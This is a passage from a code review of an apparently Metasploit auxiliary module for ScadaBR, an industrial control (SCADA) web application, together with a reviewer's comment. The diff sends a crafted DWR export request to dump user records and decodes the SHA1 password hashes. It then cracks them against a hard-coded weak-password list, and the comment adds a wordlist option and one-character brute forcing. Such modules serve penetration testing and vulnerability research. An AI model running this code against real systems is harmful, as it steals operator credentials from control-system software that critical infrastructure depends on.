modules/auxiliary/admin/http/scadabr_credential_dump.rb

```diff
@@ -0,0 +1,207 @@
+             'c0-methodName=createExportData',
+             'c0-id=0',
+             'c0-param0=string:3',
+             'c0-param1=boolean:true',
+             'c0-param2=boolean:true',
+             'c0-param3=boolean:true',
+             'c0-param4=boolean:true',
+             'c0-param5=boolean:true',
+             'c0-param6=boolean:true',
+             'c0-param7=boolean:true',
+             'c0-param8=boolean:true',
+             'c0-param9=boolean:true',
+             'c0-param10=boolean:true',
+             'c0-param11=boolean:true',
+             'c0-param12=boolean:true',
+             'c0-param13=boolean:true',
+             'c0-param14=boolean:true',
+             'c0-param15=boolean:true',
+             'c0-param16=string:100',
+             'c0-param17=boolean:true',
+             'batchId=1'
+
+    uri = normalize_uri target_uri.path, 'dwr/call/plaincall/EmportDwr.createExportData.dwr'
+    res = send_request_cgi 'uri'    => uri,
+                           'method' => 'POST',
+                           'cookie' => "JSESSIONID=#{@cookie}",
+                           'ctype'  => 'text/plain',
+                           'data'   => params.join("\n")
+
+    unless res
+      fail_with Failure::Unreachable, "#{peer} Connection failed"
+    end
+
+    unless res.body =~ /dwr.engine._remoteHandleCallback/
+      fail_with Failure::UnexpectedReply, "#{peer} Export failed."
+    end
+
+    config_data = res.body.scan(/dwr.engine._remoteHandleCallback\('\d*','\d*',"(.+)"\);/).flatten.first
+    print_good "#{peer} Export successful (#{config_data.length} bytes)"
+
+    begin
+      return JSON.parse(config_data.gsub(/\\r\\n/, '').gsub(/\\"/, '"'))
+    rescue
+      fail_with(Failure::UnexpectedReply, "#{peer} Could not parse exported settings as JSON.")
+    end
+  end
+
+  def run
+    login datastore['USERNAME'], datastore['PASSWORD']
+
+    json = export_data
+
+    service_data = { address:      rhost,
+                     port:         rport,
+                     service_name: (ssl ? 'https' : 'http'),
+                     protocol:     'tcp',
+                     workspace_id: myworkspace_id }
+
+    columns = 'Username', 'Password', 'Hash (SHA1)', 'Admin', 'E-mail'
+    user_cred_table = Rex::Text::Table.new 'Header'  => 'ScadaBR User Credentials',
+                                           'Indent'  => 1,
+                                           'Columns' => columns
+
+    if json['users'].empty?
+      print_error 'Found no user data'
+    else
+      print_good "Found #{json['users'].length} users"
+    end
+
+    json['users'].each do |user|
+      next if user['username'].eql?('')
+
+      username = user['username']
+      admin = user['admin']
+      mail = user['email']
+      hash = Rex::Text.decode_base64(user['password']).unpack('H*').flatten.first
+      pass = nil
+
+      weak_passwords = '12345', 'admin', 'password', 'scada', 'scadabr', username, mail.split('@').first
```

Comment:
I've added `PASS_FILE` option.

I left the hard-coded list of passwords in, in case they're not included in the user specified wordlist. `admin` is an extremely common password, the default password for the `admin` user, and missing from `unix_passwords.txt` wordlist.

I've also added `a-z` `A-Z` `0-9` as the password policy is weak, allowing passwords one character in length. It would be nice to crack these passwords.

The processing overhead of these hard-coded passwords is minimal.